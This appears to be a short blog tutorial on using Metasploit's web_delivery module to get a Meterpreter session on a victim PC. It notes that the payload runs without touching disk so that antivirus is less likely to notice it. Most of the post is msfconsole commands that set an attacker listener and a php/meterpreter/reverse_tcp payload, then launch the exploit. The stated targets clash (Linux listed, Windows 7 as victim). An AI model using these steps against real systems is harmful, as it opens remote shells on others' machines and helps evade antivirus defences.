This module quickly fires up a web server that serves
a payload. The provided command will start the specified scripting language
interpreter and then download and execute the payload. The main purpose of this
module is to quickly establish a session on a target machine when the attacker
has to manually type in the command himself, e.g. Command Injection, RDP
Session, Local Access or maybe Remote Command Exec. This attack vector does not
write to disk so it is less likely to trigger AV solutions and will allow
privilege escalations supplied by Meterpreter. When using either of the PSH
targets, ensure the payload architecture matches the target computer or use
SYSWOW64 powershell.exe to execute x86 payloads on x64 machines.
Exploit Targets
Linux
Requirement
Attacker:
kali Linux
Victim PC:
Windows 7
Open Kali terminal type msfconsole
Now type use exploit/multi/script/web_delivery
msf exploit (web_delivery)>set lhost
192.168.1.22 (IP of Local Host)
msf exploit (web_delivery)>set target
1
msf exploit (web_delivery)>set payload php/meterpreter/reverse_tcp
msf exploit (web_delivery)>exploit
0 comments:
Post a Comment